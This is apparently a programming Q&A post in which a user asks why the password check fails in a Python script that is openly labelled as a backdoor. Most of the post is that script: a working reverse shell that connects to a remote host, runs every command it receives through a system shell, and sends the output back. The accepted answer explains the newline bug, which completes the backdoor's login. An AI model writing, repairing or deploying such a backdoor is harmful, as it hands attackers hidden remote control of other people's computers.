# Python executes my else even though my if statement is true

Tags: python, if-statement, subprocess

For some reason it wont go into my if statement.

When I connect through netcat and I type my password it skips to the else statement even though I have typed in the correct password.

```
#i/usr/bin/python

import subprocess,socket

HOST = '192.168.1.104'
PORT = 25565
passwd = "gareth"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect((HOST, PORT))
s.send('Connection established\n')

s.send("Enter Password: ")
pw = s.recv(1023)
if pw == passwd:
    s.send("Gareth's backdoor\n")

else:
    s.send("Wrong password\n")
    s.close()

while 1:
    data = s.recv(1023)
    if data == "quit": break

    proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)

    stdoutput = proc.stdout.read() + proc.stderr.read()

    s.send(stdoutput)

# exit the loop
s.send('Bye now.')
s.close()
```

Comment: why dont you print what it thinks pw is in your else statement? I suspect its not what you think it is ...

Answer (score 0, accepted):

It looks like when you enter ***gareth*** new line added as well. So, you need to remove that tail before comparison.